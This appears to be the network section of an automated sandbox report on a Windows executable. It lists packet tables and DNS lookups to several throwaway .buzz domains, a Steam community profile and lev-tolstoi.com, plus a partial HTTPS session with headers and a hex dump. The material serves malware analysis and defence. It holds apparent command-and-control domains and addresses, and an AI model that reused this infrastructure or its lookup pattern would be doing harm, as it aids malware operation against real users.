                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.187545061 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.187597036 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.187659025 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.191073895 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.191087961 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.685441017 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.685554028 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.688344955 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.688369989 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.688685894 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.729907990 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.738177061 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:57.779331923 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472249985 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472282887 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472320080 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472321033 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472343922 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472368002 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472387075 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472387075 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472392082 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472414017 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.472429991 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.668241024 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.668313026 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.668370008 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.668400049 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.668440104 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.698843002 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.698880911 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.698947906 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.698947906 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.698992014 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.701005936 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.701036930 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.701054096 CET49708443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.701060057 CET4434970823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.883692026 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.883764029 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.883867025 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.884241104 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.884260893 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.098989010 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.099091053 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.100666046 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.100681067 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.100944996 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.102242947 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.102242947 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.102308989 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.824990988 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.825089931 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.825172901 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.825419903 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.825444937 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.825459003 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:00.825464964 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:01.017591953 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:01.017656088 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:01.017771006 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:01.018115997 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:01.018132925 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.275182009 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.275275946 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.326536894 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.326574087 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.326947927 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.328845978 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.328845978 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:02.328974962 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052025080 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052062035 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052087069 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052114964 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052117109 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052162886 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052186012 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052210093 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052275896 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.052290916 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.060434103 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.060483932 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.060498953 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.077070951 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.077121973 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.077137947 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.120714903 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.171304941 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.214319944 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.253094912 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257051945 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257082939 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257117033 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257138968 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257183075 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257189035 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257224083 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257261038 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257361889 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257373095 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257390022 CET49716443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.257395029 CET44349716104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.387984037 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388039112 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388106108 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388403893 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:03.388412952 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.694468975 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.694621086 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.695947886 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.695967913 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.696234941 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.697365999 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.697509050 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:04.697536945 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741566896 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741733074 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741782904 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741894007 CET49722443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.741916895 CET44349722104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.840836048 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.840895891 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.840970993 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.841264963 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:05.841279030 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.098997116 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.099147081 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.100358009 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.100374937 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.100622892 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104562998 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104682922 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104707956 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.104787111 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.151335955 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927125931 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927241087 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927391052 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927561045 CET49728443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:07.927582026 CET44349728104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294397116 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294442892 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294562101 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294935942 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.294946909 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.553368092 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.553637028 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.555104017 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.555120945 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.555444956 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557029963 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557029963 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557085037 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557169914 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:09.557178974 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.530864954 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.530981064 CET44349737172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.531039000 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.531101942 CET49737443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:10.531121969 CET44349737172.67.157.254192.168.2.6

                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:54.873140097 CET6390953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.012514114 CET53639091.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.018065929 CET5611653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.157594919 CET53561161.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.160830021 CET5450353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.301918983 CET53545031.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.305197001 CET6495053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.445703030 CET53649501.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.466978073 CET5437553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.606548071 CET53543751.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.609798908 CET5414253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.749193907 CET53541421.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.752379894 CET5956953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.892694950 CET53595691.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.898293018 CET6158153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.037426949 CET53615811.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.040796995 CET5627753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.179886103 CET53562771.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.743247032 CET6127053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.882503986 CET53612701.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.147675037 CET5233553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.292951107 CET53523351.1.1.1192.168.2.6

                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:54.873140097 CET192.168.2.61.1.1.10xbb76Standard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.018065929 CET192.168.2.61.1.1.10x863Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.160830021 CET192.168.2.61.1.1.10x5f23Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.305197001 CET192.168.2.61.1.1.10x77d4Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.466978073 CET192.168.2.61.1.1.10x60c0Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.609798908 CET192.168.2.61.1.1.10xaf44Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.752379894 CET192.168.2.61.1.1.10x83d4Standard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.898293018 CET192.168.2.61.1.1.10xa596Standard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.040796995 CET192.168.2.61.1.1.10x51aeStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.743247032 CET192.168.2.61.1.1.10xc0e6Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.147675037 CET192.168.2.61.1.1.10xa303Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.012514114 CET1.1.1.1192.168.2.60xbb76Name error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.157594919 CET1.1.1.1192.168.2.60x863Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.301918983 CET1.1.1.1192.168.2.60x5f23Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.445703030 CET1.1.1.1192.168.2.60x77d4Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.606548071 CET1.1.1.1192.168.2.60x60c0Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.749193907 CET1.1.1.1192.168.2.60xaf44Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:55.892694950 CET1.1.1.1192.168.2.60x83d4Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.037426949 CET1.1.1.1192.168.2.60xa596Name error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:56.179886103 CET1.1.1.1192.168.2.60x51aeNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.882503986 CET1.1.1.1192.168.2.60xc0e6No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:58:58.882503986 CET1.1.1.1192.168.2.60xc0e6No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.292951107 CET1.1.1.1192.168.2.60xa303No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 28, 2024 09:59:08.292951107 CET1.1.1.1192.168.2.60xa303No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                                        • lev-tolstoi.com

                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.64970823.55.153.1064433524C:\Users\user\Desktop\5Z19n7XRT1.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-28 08:58:57 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                                        2024-12-28 08:58:58 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:58:58 GMT
                                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=378308b36cb3d3ce49665561; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                        2024-12-28 08:58:58 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
